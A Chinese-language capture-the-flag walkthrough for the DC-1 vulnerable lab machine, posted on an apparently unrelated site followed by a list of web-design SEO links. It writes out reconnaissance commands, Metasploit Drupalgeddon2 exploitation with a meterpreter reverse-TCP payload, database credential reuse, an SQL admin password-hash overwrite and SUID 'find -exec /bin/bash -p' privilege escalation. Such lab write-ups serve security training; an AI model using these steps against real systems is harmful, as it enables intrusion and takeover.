当前位置: 首页 > news >正文

赣州网站建设 赣州网页设计网站添加微信支付功能

赣州网站建设 赣州网页设计,网站添加微信支付功能,企业网站优化工具,在网站上使用特殊字体以前写过了#xff0c;有一些忘了#xff0c;快速的重温一遍。 DC一共九个靶场#xff0c;目标一天一个。 文章目录环境配置#xff1a;信息搜集#xff1a;漏洞复现#xff1a;FLAG获取环境配置#xff1a; 最简单的办法莫过于将kali和DC-1同属为一个nat的网络下。 信…以前写过了有一些忘了快速的重温一遍。 DC一共九个靶场目标一天一个。 文章目录环境配置信息搜集漏洞复现FLAG获取环境配置 最简单的办法莫过于将kali和DC-1同属为一个nat的网络下。 信息搜集 首先探测靶机ip两种方法 arp-scan -l nmap -sP 192.168.28.0/24靶机ip为192.168.28.129 明显有一个80端口继续用nmap探测端口情况。 还开起了22和111端口wappalyzer信息搜集看一下框架。 或者用kali自带的whatweb指纹探测。 whatweb -v 192.168.28.129同样得到的是Drupal7.0版本msfconsole里存在Drupal攻击模块。 漏洞复现 search去找Drupal模块 search Drupal进入exploit/unix/webapp/drupal_drupalgeddon2模块然后查看payload。 use exploit/unix/webapp/drupal_drupalgeddon2 show payloadsphp/meterpreter/reverse_tcp可以利用。 然后设置payload和配置。 set payload /php/meterpreter/reverse_tcp set RHOSTS 192.168.28.129输入exploit启动。 成功拿到shell先反弹shell。 python -c import pty;pty.spawn(/bin/bash)FLAG获取 然后ls -l发现flag1. Every good CMS needs a config file - and so do you 每个好的CMS都需要一个配置文件 - 你也是明显是想让我们去查看配置文件。 发现settings.php文件查看后得到flag2. Brute force and dictionary attacks arent the* only ways to gain access (and you WILL need access).* What can you do with these credentials? 蛮力和字典攻击不是*只有获得访问权限的方法您将需要访问权限。* 您可以使用这些凭据做什么不能爆破但在配置中存在mysql账号密码可以通过mysql查看账号密码。 mysql -udbuser -pR0ck3t登录mysql。 在其中找到user表。 但其中的pass被加密猜测存在哈希加密代码查找。 find . -name *hash*找到的password-hash.sh这肯定是加密代码cat一下。 #!/usr/bin/php ?php/*** Drupal hash script - to generate a hash from a plaintext password** Check for your PHP interpreter - on Windows youll probably have to* replace line 1 with* #!c:/program files/php/php.exe** param password1 [password2 [password3 ...]]* Plain-text passwords in quotes (or with spaces backslash escaped).*/if (version_compare(PHP_VERSION, 5.2.0, )) {$version PHP_VERSION;echo EOFERROR: This script requires at least PHP version 5.2.0. You invoked it withPHP version {$version}. \n EOF;exit; }$script basename(array_shift($_SERVER[argv]));if (in_array(--help, $_SERVER[argv]) || empty($_SERVER[argv])) {echo EOFGenerate Drupal password hashes from the shell.Usage: {$script} [OPTIONS] plan-text password Example: {$script} mynewpasswordAll arguments are long options.--help Print this page.--root pathSet the working directory for the script to the specified path.To execute this script this has to be the root directory of yourDrupal installation, e.g. /home/www/foo/drupal (assuming Drupalrunning on Unix). Use surrounding quotation marks on Windows.password1 [password2 [password3 ...]]One or more plan-text passwords enclosed by double quotes. Theoutput hash may be manually entered into the {users}.pass field tochange a password via SQL to a known value.To run this script without the --root argument invoke it from the root directory of your Drupal installation as./scripts/{$script} \n EOF;exit; }$passwords array();// Parse invocation arguments. while ($param array_shift($_SERVER[argv])) {switch ($param) {case --root:// Change the working directory.$path array_shift($_SERVER[argv]);if (is_dir($path)) {chdir($path);}break;default:// Add a password to the list to be processed.$passwords[] $param;break;} }define(DRUPAL_ROOT, getcwd());include_once DRUPAL_ROOT . /includes/password.inc; include_once DRUPAL_ROOT . /includes/bootstrap.inc;foreach ($passwords as $password) {print(\npassword: $password \t\thash: . user_hash_password($password) .\n); } print(\n);先看帮助理解脚本如何使用。 然后运行脚本然后得到加密过后密码随后密码替换。 update users set pass$S$Ds.RBZ79FgPXwUiHZZd5eo2rVbYQzTomLgBhA24Sw04Bnr3UWSpBwhere nameadmin;然后登录网站得到flag3 Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow. 特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取阴影中的东西。在/etc/passwd中发现flag4用户。 得到flag4。 Can you use this same method to find or access the flag in root?Probably. But perhaps its not that easy. Or maybe it is? 您可以使用相同的方法来查找或访问 root 中的标志吗 可能。但也许这并不容易。 或者也许是访问root文件夹需要root权限。 SUID提权: find / -user root -perm -4000 -print 2/dev/null其中就有find直接用。 find / -exec /bin/bash -p \;进入root目录得到最后的flag。 Well done!!!!Hopefully youve enjoyed this and learned some new skills.You can let me know what you thought of this little journey by contacting me via Twitter - DCAU7 干的好希望您喜欢这个并学到了一些新技能。你可以让我知道你对这个小旅程的看法 通过推特与我联系 - DCAU7利用hydra暴力破解得到flag4的密码。
http://www.dnsts.com.cn/news/195374.html

相关文章:

  • wordpress做个人教学网站网站建设的域名是什么
  • 搭建网站实时访问地图重庆工程项目
  • 小门户网站模版如何向搜索引擎提交网站
  • 新网站建设 英文翻译如何做网站啊
  • 建设部考试网站做胎压的网站
  • 宁波建设安全协会网站中文域名注册官网
  • 网站改版方案ppt如何建设一个网站
  • 徐州企业建站程序公司的网站怎么做
  • 韩国男女做那个视频网站做网站公司需要什么
  • 元隆盛建设集团有限公司网站门户网站建设方案模板
  • 遵义建站平台哪家好wordpress整站搬家
  • 建设一个网站多钱微信小程序上线流程
  • 南漳做网站阿里国际网站首页可以做全屏不
  • 品牌网站建设的要点外贸网站推广哪个比较好
  • 做网站要准备什么资料广州越秀区租房子多少钱一个月
  • 个人网站设计图片wordpress pdf 在线读
  • 做网站哪些软件网站建设需求分析表怎么写
  • 网站开发 李博河北区做网站公司
  • 苏州优化网站哪家好网络营销推广方法是什么和什么的合理利用
  • 可以转app的网站怎么做的怎样开个人网站
  • 网站内容建设方法步骤网站如何做收款二维码
  • 网站建设深圳龙华北京网站优化推广分析
  • 做货代用的网站公司内部网站系统
  • 建设银行wap网站学校网站建设经验介绍
  • 网站建设报价请示网络平台搭建是什么意思
  • 网站是怎么优化的项目网创业
  • 网站设计培训班询WordPress营销推广返佣插件
  • 常州做网站哪家快如何自己做一个网址
  • 哪个网站可以做编程题建设 展示型企业网站
  • 网站建设费用价格明细表135编辑器 wordpress